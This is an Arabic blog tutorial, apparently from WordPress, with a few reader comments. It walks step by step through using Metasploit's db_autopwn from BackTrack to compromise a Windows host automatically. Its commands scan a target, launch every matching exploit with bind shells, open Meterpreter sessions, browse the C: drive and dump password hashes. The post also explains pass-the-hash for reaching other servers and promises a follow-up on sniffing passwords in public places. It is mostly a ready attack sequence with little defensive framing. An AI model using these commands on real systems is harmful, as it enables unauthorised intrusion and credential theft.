استخدام اداة db_autopwn لاختراق نظام ويندوز بشكل اوتوماتيكي

 

 

(يرجى الضغط على الصور المستخدمة في الشرح لمشاهدتها بالحجم الحقيقي)

اليوم سأقوم بشرح كيفية استخدام اداة db_autopwn لاختراق نظام ويندوز بشكل اوتوماتيكي ما سنقوم به هو اعطاء عنوان الجهاز الذي نود اختراقه للأداة لتقوم هي بتطبيق الثغرات الموجودة في مشروع ميتاسبلويت على النظام المستهدف وعند الانتهاء تكون النتيجة بفتح جلسة ميتيربرتر Meterpreter Session لكل ثغرة نجحنا في استغلالها

عمليه اختبار الاختراق هذه جرى تنفيذها على نظام Backtrack و على الاصدار الثالث من مشروع Metasploit بشكل عام انصح باستخدام نظام Backtrack لتنفيذ عمليات اختبار الاختراق اولا للبدأ بالعملية نقوم بالدخول الى مجلد مشروع ميتاسبلويت الاصدار الثالث بالامر التالي:

cd /pentest/exploits/framwork3

وبعدها نطبق الامر :

msfconsole/.

عندها ننتظر حتى يتم تحميل المشروع وبدأ عمله كما هو موضح في الصورة التالية:

الآن وقد تم تحميل المشروع سنقوم بتحميل اضافة sqlite3 والتي ستستخدمها اداة db_autopwn لتخزين بيانات عملية الاختراق للقيام بذلك ننفذ الامر التالي:

db_driver sqlite3

كما هو موضح في الصورة التالية:

الآن تمت عملية التحميل بنجاح سنقوم بانشاء قاعدة بيانات جديدة بالاسم ahoss_meterpreter والاتصال بها عن طريق الامر :

db_connect ahoss_meterpreter

كما في الصورة :

 

تمت عملية الانشاء والاتصال بقاعدة البيانات database بنجاح الآن نأتي الى مرحلة اخرى وهي عملية فحص الجهاز المستهدف لكشف البورتات المفتوحة حيث ستعتمد اداة db_autopwn في تنفيذها للثغرات على هذه البورتات هنا سنقوم باستخدام امر db_nmap متبوعا بعنوان الجهاز والذي سيستعين باداة nmap المشهورة لعمل الفحص

حسب الامر التالي:

db_nmap 192.168.14.68

لاحظ الصورة :

كما تلاحظون وجدنا ثلاث بورتات مفتوحة تابعة لبروتوكولات مايكروسوفت يمكن ان نجد بورتات اخرى حسب الخدمات الموجودة على الجهاز كلما كانت الخدمات اكثر كلما كانت الفرصة بنجاح عملية الاختراق اكبر حيث انه يتم استغلال الثغرات حسب نتائج فحص nmap

الآن المرحلة الاخيرة من العملية وهي بدا استغلال الثغرات على الجهاز وذلك بتنفيذ امر db_autopwn للامر عدة خيارات موضحة في الصورة التالية:

بالنسبة لي سأقوم باستخدام الامر مع الخيار  p لاجبار الاداة على تجربة الثغرات حسب البورتات المفتوحة open ports والخيار e لتجربة الثغرات على الاهداف الموجودة والخيار b لكي نفتح اتصال bind shell عكس الاتصال العكسي

الامر سيكون بهذه الصيغة:

db_autopwn -p -e -b

ثم نضغط enter ليبدأ النتفيذ:

ننتظر حتى يتم التنفيذ ومشاهدة النتائج في الجهاز الذي استهدفته تم فتح جلستين ميتيربرتر meterpreter لمشاهدة الجلسات التي تم فتحها بعد الاستغلالات الناجحة نقوم بتنفيذ الامر:

sessions -l

نتيجة التنفيذ عندي اعطتني :

لاستخدام احدى هذه الجلسات للدخول على الجهاز المستهدف نقوم بتطبيق الامر sessions مع الخيار i متبوع برقم الجلسة كالتالي:

sessions -i 1

هنا قمت باستخدام الجلسة الاولى ليظهر سطر اوامر meterpreter وبعدها نفذت الامر help لارى الاوامر التي يمكن استخدامها :

بعد ذلك قمت بالدخول الى المجلد الجذر عن طريق الامر cd و قمت بعرض المحتويات مع الملاحظة ان المجلد الجذر Root Directory هو القرص C

/cd

ls

لاحظ الصورة :

واخيرا قمت بتنفيذ الامر hashdump لرؤية هاش الباسوردات الموجودة في الذاكرة الحصول على الهاش hash مفيد في كثير من الاحيان مثلا اذا قمنا باختراق جهاز واردنا الاتصال بسيرفر معين عن طريق ذلك الجهاز باستخدام معلومات مستخدم معين اذا كنا لا نمتلك الباسوورد يمكن استخدام طريقة pass the hash وذلك بتمرير الهاش عند عملية التوثيق مع السيرفر

لاحظ نتيجة امر hashdump

 

هنا ينتهي موضوعنا لليوم الموضوع القادم ان شاء الله سيكون عن التقاط كلمات السر في الشبكات مثلا في المقاهي الجامعات والمطارات

مع تحياتي …

 

 

4 تعليقات

Filed under Uncategorized

4 responses to “استخدام اداة db_autopwn لاختراق نظام ويندوز بشكل اوتوماتيكي

  1. aiouche

    sorry to say 3anni 4e egreytou mais ma vet rja3et l lewsav welaa 6aba99touu wela jarabet mais rajjj3alou thx 3lih ba3de

  2. شرح رائع يا اخي مشكور

  3. ahmedsameh

    يا شباب بجي ادخل الامرdb_driver sqlite3 يقولي not found command

اترك رد

إملأ الحقول أدناه بالمعلومات المناسبة أو إضغط على إحدى الأيقونات لتسجيل الدخول:

شعار ووردبريس.كوم

أنت تعلق بإستخدام حساب WordPress.com. تسجيل خروج   /  تغيير )

Google photo

أنت تعلق بإستخدام حساب Google. تسجيل خروج   /  تغيير )

صورة تويتر

أنت تعلق بإستخدام حساب Twitter. تسجيل خروج   /  تغيير )

Facebook photo

أنت تعلق بإستخدام حساب Facebook. تسجيل خروج   /  تغيير )

Connecting to %s